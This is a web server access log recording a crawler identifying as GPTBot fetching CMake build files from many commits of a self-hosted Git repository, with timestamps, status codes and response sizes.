"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15127] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11200] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11232] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11152] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11232] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16064] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13737] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11182] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11208] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13729] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24301] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11207] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:18:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11324] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11122] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11182] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11323] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11201] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 